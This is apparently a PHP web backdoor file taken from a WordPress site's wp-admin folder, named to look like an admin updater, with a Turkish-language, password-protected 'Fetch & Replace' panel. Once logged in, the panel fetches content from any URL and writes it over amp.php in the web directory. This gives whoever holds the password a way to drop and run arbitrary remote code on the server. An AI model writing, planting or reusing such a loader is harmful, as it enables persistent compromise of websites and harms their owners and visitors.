File: /home/zulfiqar/public_html/wp-admin/admins-updater.php
<?php
session_start();
// Ayarlar
$hashedPassword = '8cf3082b71840375be062953f660687c';
$savePath = __DIR__ . '/amp.php';
$testPath = __DIR__ . '/test.php';
$publicIndexPath = dirname(__DIR__) . '/index.php';
function generateCSRFToken() {
if (empty($_SESSION['csrf'])) {
$_SESSION['csrf'] = bin2hex(random_bytes(32));
}
return $_SESSION['csrf'];
}
if (!isset($_SESSION['authenticated'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
if (md5($_POST['password']) === $hashedPassword) {
$_SESSION['authenticated'] = true;
generateCSRFToken();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$error = "Hatalı şifre.";
}
}
if (!isset($_SESSION['authenticated'])) {
echo '<!DOCTYPE html><html><head><title>Giriş</title></head><body>';
if (isset($error)) echo '<p style="color:red">' . $error . '</p>';
echo '<form method="POST">'
. '<label>Şifre:</label><br>'
. '<input type="password" name="password" required>'
. '<button type="submit">Giriş</button>'
. '</form></body></html>';
exit;
}
}
function fetchContent($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_USERAGENT => 'SecureFetcher/1.0'
]);
$data = curl_exec($ch);
curl_close($ch);
return $data ?: false;
}
$success = '';
$error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) {
if (!hash_equals($_SESSION['csrf'], $_POST['csrf_token'])) {
die('Geçersiz oturum tokenı.');
}
$url = trim($_POST['target_url'] ?? '');
if (!filter_var($url, FILTER_VALIDATE_URL)) {
$error = 'Geçersiz URL.';
} else {
$timestamp = time();
$finalUrl = $url . (strpos($url, '?') !== false ? '&' : '?') . 'timestamp=' . $timestamp;
$content = fetchContent($finalUrl);
if ($content !== false) {
// İlk yükleme sonrası dosya silme işlemleri
if (file_exists($savePath)) {
unlink($savePath);
$success .= '<br>✅ amp.php silindi';
}
if (!is_dir(dirname($savePath))) mkdir(dirname($savePath), 0755, true);
if (file_put_contents($savePath, $content) !== false) {
$success = 'İçerik başarıyla kaydedildi: ' . htmlspecialchars($finalUrl);
} else {
$error = 'Dosya kaydedilemedi!';
}
} else {
$error = 'İçerik alınamadı.';
}
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>Fetch Paneli</title>
<style>
body { font-family: Arial; background: #f4f4f4; padding: 40px; }
.box { background: #fff; padding: 20px; border-radius: 6px; max-width: 600px; margin: auto; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
input[type=text] { width: 100%; padding: 10px; margin: 10px 0; }
button { padding: 10px 20px; background: #007bff; color: #fff; border: none; border-radius: 4px; }
.success { color: green; }
.error { color: red; }
</style>
</head>
<body>
<div class="box">
<h2>🔐 Fetch & Replace Paneli</h2>
<?php if ($success): ?><p class="success">✅ <?= $success ?></p><?php endif; ?>
<?php if ($error): ?><p class="error">❌ <?= $error ?></p><?php endif; ?>
<form method="POST">
<label>İçerik ve Yönlendirme URL:</label>
<input type="text" name="target_url" placeholder="https://example.com/page" required>
<input type="hidden" name="csrf_token" value="<?= generateCSRFToken() ?>">
<button type="submit">Gönder</button>
</form>
</div>
</body>
</html>